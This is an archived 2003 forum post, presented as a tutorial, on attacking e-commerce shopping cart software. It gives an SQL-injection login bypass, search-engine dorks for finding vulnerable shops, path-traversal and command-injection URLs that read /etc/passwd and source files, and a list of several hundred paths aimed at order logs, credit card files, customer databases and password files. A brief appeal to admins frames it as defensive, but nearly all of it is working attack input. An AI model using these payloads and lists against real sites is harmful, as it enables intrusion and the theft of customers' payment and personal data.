Shopping Carts And Weak Security Explained By Fris

Full Version: Shopping Carts And Weak Security Explained By Fris

GovernmentSecurity.org > The Archives > Exploit Articles

Faceless Master

Jan 13 2004, 05:14 PM

Here is a tut.

QUOTE

Shopping Carts and Weak Security Explained by fris

Written on December 22nd 2003, Merry Christmas Packetstorm Security.

Lets go Through Some first

Alabanza AlaCart Shopping Cart, this has a SQL Injection. When you access
the admin section all you have to do is enter '=' for login and password
and you have access to everything, and your whole company is vuln. How does
a person find the admin section? Well simple. Ways around google.

You could do a simple search for example inurl:s-cart/admin and results would
come up.

---

CommerceSQL

Regarding:

http://packetstormsecurity.nl/0311-exploits/commerceSQL.txt

People using google again could do a simple search on
inurl:admin/files/order.log

CommerceSQL Proof of Concept as Follows:

example:

www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

example:

http://www.domain.com/cgi-bin/commercesql/...min/manager.cgi

example:

http://www.domain.com/cgi-bin/commercesql/...files/order.log

---

Meta Cart:

Meta Cart is a free Ecommerce Shopping Cart System based on ASP and SQL.

the form where the database is located with the information is

http://www.domain.com/database/metacart.mdb
http://www.domain.com/metacart/database/metacart.mdb

So yet again you could do a simple inurl:metacart.mdb in google and find
results and just grab the access database and open it up in access and you
have the companies information. This is why companies need to protect this
data. Its a must for security reasons.

All they would have to do is set the permissions on the database in the
control panel in Information services, But admins are too lazy. They don't
double check. So when Your folder is set to Write, Read and Execute. You know
something is wrong.

They should be set to Write and Execute for Anonymous so people Can't Download
the database. Then rwx on the database itself so you can make changes of
course.

----

SHOP.PL Vuln

Yet another system that people are using against companies, to again access to
their files and get data.

Proof of concept.

http://www.domain.com/cgi-local/shop.pl/page=shop.cfg is where the config file
is located.

http://www.domain.com/cgi-local/shop.pl/pa..../../etc/passwd

http://www.domain.com/cgi-local/shop.pl/page=./product_list

and again you can do a simple search in google for inurl: shop.pl

Windows Servers VULN, lazy admins:

A way to get .mdb files (access databases) off ASP servers

Search for shopdisplaycategories.asp

inurl:shopdisplaycategories.asp

plenty of sites use this, once you find some results change the site to.

http://www.domain.com/shopdbtest.asp

now you are in a section in the site which you get info where the mdb file is
laying

xDatabase: shopping and xDblocation:\shop_db now just put
http://www.domain.com/shop_db/shopping.mdb

Bascially you can download their Access database with their whole online shop,
all there customer data, lazy admins that dont put the correct permissions
will leave this open, but smart ones wont let you download the database.

Other Key tricks:

Going in google:

search for "/cgi/shopper.cgi?" or for more results try "/cgi-bin/shopper.cgi?"
("shopcart.cgi" can also be used)

find a site ("your shopping cart" or "Subtotal $0.00") and remove everything
after shopper.cgi

(the url should contain "/cgi/shopper.cgi?display=action"

or

"/cgi-bin/shopper.cgi?display=action" or possibly "checkout=action")

add "?search=action&keywords=%20&template=order.log" to the url

and

/cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf
/cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf
/cgi-bin/pdg_cart/shopper.conf
/cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt

are some results to play with.

Other Vuln's Using Google searching:

inurl:shopping.mdb
inurl:cart/cart.asp
inurl:/productcart
inurl:vti_inf.html
inurl:service.pwd
inurl:users.pwd
inurl:authors.pwd
inurl:administrators.pwd
inurl:shtml.dll
inurl:shtml.exe
inurl:fpcount.exe
inurl:default.asp
inurl:showcode.asp
inurl:sendmail.cfm
inurl:getFile.cfm
inurl:imagemap.exe
inurl:test.bat
inurl:msadcs.dll
inurl:htimage.exe
inurl:counter.exe
inurl:browser.inc
inurl:hello.bat
inurl:default.asp\
inurl:dvwssr.dll
inurl:cart32.exe
inurl:add.exe
inurl:index.jsp
inurl:SessionServlet
inurl:glimpse
inurl:man.sh
inurl:AT-admin.cgi
inurl:AT-generate.cgi

Once finding a site, you can use various scanners.

WIN32 Scanners:

http://packetstormsecurity.nl/UNIX/cgi-scanners/voideye.zip is a very good one.

http://rhino.deny.de/ Triton Scanner

http://www.ksoze.deny.de/ ksoze's Scanner

http://wolfman.deny.de/ webshare scanner

http://xtremet.deny.de/ cmx scanner

http://www.accessdiver.com Accessdiver

http://www.safety-lab.com you can get Shadow Security Scanner (shareware)

UNIX: (opensource)

http://packetstormsecurity.nl/UNIX/cgi-sca...kto-1.31.tar.gz

All of these can load a path list, to test your vuln servers to do auditing,
here is an updated list of security holes. against most of the shopping
carts. Admins please protect your systems, You dont want your customers data
at risk.

---

Loadable List to test security:
--

/store/log_files/your_order.log
/cgi-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/datasources/expire.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/orders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/your_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgibin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin/html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin/cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/Admin_files/expire.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin/Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin/pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin/admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin/admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/datasources/Expire.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/import.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win/shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-local/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/shop/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/shop/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/log_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.cgi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/metacart.mdb
/cgi-local/shop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/log/
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/scripts/c32web.exe
/cgis/orders/orders.txt
/logfile/
/shop_db/shopping.mdb
/shopping.mdb
/weblog/
/config/datasources/cvv2.mdb
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-sys/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgi-win/cart32.exe
/cgi-bin/loadpage.cgi
/dcshop/orders/orders.txt
/shop/show.php?q='
/cgibin/orders/orders.txt
/bin/pagelog.cgi
/cgi-bin/shop/orders/orders.txt
/_database/shopdbtest.asp
/cgibin/pagelog.cgi
/cgi-local/shop.pl/page=;cat%20shop.pl
/shop/search.php?q='
/cgi-sys/cart32.exe
/order13.txt
/weblogs/
/orderb/shop.mdb
/config/datasources/order.mdb
/store/cgi-bin/Admin_files/Store_user_lib.pl
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/Orders/order.log
/logs/access_log
/config/datasources/your_order.mdb
/ecommerce/admin/admin/admin.asp
/mall_log_files/order.log
/bin/cart32.exe
/htbin/DCShop/orders/orders.txt
/Admin_files/Authorize_Net.pl
/logging/
/database/
/cgi-sys/shop/auth_data/auth_user_file.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi-local/shop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-win/DCShop/orders/orders.txt
/store/Admin_files/Authorize_Net.pl
/cart/cart.asp
/bin/DCShop/orders/orders.txt
/scripts/pagelog.cgi
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb
/webcart/config/clients.txt
/dc/auth_data/auth_user_file.txt
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/bin/orders/orders.txt
/cgi-bin/Web_Store/web_store.cgi
/cgis/pagelog.cgi
/cgi-bin/orders/orders.txt
/merchant/shopdbtest.asp
/cgi-local/shop.pl/page=shop.cfg
/cgis/shop.pl/page=;cat%20shop.pl
/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd
/cg-bin/
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/ecommerce/admin/adminLeft/admin.asp
/webcart/orders/import.txt
/cgibin/shop/auth_data/auth_user_file.txt
/productcart/database/eipc.mdb
/mysql/cheersoundchdb.mdb
/cgi-bin/order.txt
/scripts/iisadmin/tools/mkilog.exe
/ProductCart/database/EIPC.mdb
/databases/
/cgi-sys/orders/orders.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/database/EIPC.mdb
//cgi-bin/orders.txt
/vpasp-shopcart/shopdbtest.asp
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/DCShop/orders/orders.txt
/mysql/shopping350.mdb
/_database/shopping.mdb
/htbin/cart32.exe
/PDG_Cart/shopper.config
/cgis/shop/auth_data/auth_user_file.txt
/shop/SHOPDBTEST.ASP
/bin/shop/orders/orders.txt
//cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/dcshop_admin.cgi
/_database/shopping400.mdb
/scripts/shop.pl/page=;cat%20shop.pl
/cgibin/PDG_Cart/shopper.conf
/cgibin/DCShop/orders/orders.txt
/cgibin/%20awstats.pl?output=keywords
/cgi/shop/orders/orders.txt
/cgi-bin/cart32_old.exe
/webshop/templates/cc.txt
/webcart/orders
/productcart/database/shop.mdb
/index.php?link=order
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/shopping/shopdisplayproducts.asp?
/ccbill-local.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/c32web.exe/CheckError?error=53
/server/admin_files/commerce_user_lib.pl
/shopping/shopdisplayproducts.asp?id=1&cat=order.log
/mail.cgi
/cgibin/admin_files/
/cgi-bin/mail/form.cgi
/cgibin/shopping/database/metacart.mdb
/globill/ver12otellog.txt
/cgi-bin/shopping.mdb
/shopping%20.mdb
/cgi-bin/mail.cgi
/cgi-bin/FORM.cgi
/cgibin/shop/database/metacart.mdb
/mail/form.cgi
/cgibin/shop/shopping350.mdb
/form.cgi
/shopping/cgi-bin/cart32.ini
/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/c32web.exe/ShowProgress
/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto
/cgibin/orders.txt
/cgibin/scripts/shop/shopping350.mdb
/form/mail.cgi
/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd
/webshop/logs/cc.txt
/form/form.cgi
/store/index.cgi?page=../../../../../../../../etc/passwd
/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail
/cgibin/%20awstats.pl?
/cgi-bin/Form.cgi
/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25
/admin.mdb
/cgi-bin/cart32.exe/error
/cgi/mail.cgi
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/csql/index.cgi?page=../admin/files/order.log
/cgi-bin/admin_files/
/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd
/admins.asp
/cgi-bin/cart_top
/cgi-bin/mail/mail.cgi
/shopadmin.asp
/cgi-bin/order.log
/mailform.pl
/cgibin/admin.pl
/vpasp/shopdisplayproducts.asp?
/policies1.htm
/cgi-bin/c32web_old.exe
/cgi-bin/c32web.exe
/cgi-bin/form/form.cgi
/cgibin/metacart.mdb
/shopdisplayproducts.asp
/cgi-sys/DCShop/orders/orders.txt
/ccbill6/secure/
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgi-bin/ibill.log
/ccbill6/
/password.txt
/cgi-bin/PDG_cart/card
/cgibin/www.google.com
/honeymoonhideaway.htm+honeymoon+charleston
/cgibin/awstats.pl%3Flang%3Dnl
/cgibin/admin.pl?setpasswd
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/%20awstats.pl?output=keywords
/shop/shopping450.mdb
/ccbill6/secure/ccbill.log
/cgibin/awstats.pl%3Flang%3Des%26update%3D1
/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf
/cgi-bin/form.cgi
/M83A
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awstats.pl%3Flang%3Dit
/orderdb/database/eipc.mdb
/cg-bin//eshop/database/order.mdb
/store/database/comersus.mdb
/cgibin/password.mdb
/~admin/guestbook
/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dnl
/cgibin/%20awstats.pl?output=keywords
/sumthin
/cgibin/cgibin/%20awstats.pl?output=keywords
/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/productcart/database/eipc.mdb
/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde
/mail/mail.cgi
/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl
/cg/.%20/comersus/database/comersus.mdb
/index%20of%20/%20productcart/database/eipc.mdb
/scripts/nsiislog.dll
/cgibin/order.cgi
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/cgi-bin/awstats.pl%3Flang%3Dde
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgibinserver/admin_files/commerce_user_lib.pl
/cgibin/store/Admin_files/myorderlog.txt
//cgibin/orders.txt
/cgibin/database/shopping.mdb
/cgibin/shopping/shopadmin.asp
/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgibin/allmanageup.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/eshop/database/log.mdb
/cgibin/awsta
/cgibin/nph-proxy.pl
/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1
//config/datasources/expire.mdb
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des
/cgibin/ccbill/password/.htpasswd
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases
/eshop/en/database/credit.mdb
/cgi-bin/pdg_cart/shopper.conf
/password.mdb
/data/verotellog.txt
/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1
/productcart/eipc.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit
/index%20of%20/webshop/templates/cc.txt
/cartdb/database/eipc.mdb
/cgi-bin/eshop/database/order.mdb
/cgibin//fpdb/shopping400.mdb
/cgibin/order.txt
/cgi-bin/cart32.exe/expdate%20algunas%20veces
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords
/cgibin/database/comersus.mdb
/cgi-bin/awstats.pl%3Flang%3Des
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr
/globill/
/cgibin/fpdb/shopping400.mdb
/cgibin/perl.exe
/eshop/en/database/log.mdb
/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log
/cg/comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail
/cgibin/admin.mdb
/cgi-bin/whereami.cgi?g=ls
/cgibin/xxxhu
/cgibin/cartserver/admin_files/commerce_user_lib.pl
/cgibin/%20awstats.pl?output=keywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr
/robot.txt
/cgi-bin/form/mail.cgi
/ibill/mypins/
/cgi-bin/awstats.pl%3Flang%3Dnl
/cgibin/allmanage_admin.pl
/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords
/cg-ibin/admin_files/
/cgibin/cart/comersus.mdb
/cg-bin/eshop/database/order.mdb
/cgibin/htt
/cgibin/phf
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den
/database/eipc.mdb
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/script/shop/shopping350.mdb
/cgibin/shopping350.mdb
/cg-bin/eshop/en/database/credit.mdb
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den
/cgi-bin/add-passwd.cgi
/logs/200306/charleston.com/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/cgibin/store/log_files/your_order.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin/webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htaccess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples/config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin/mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
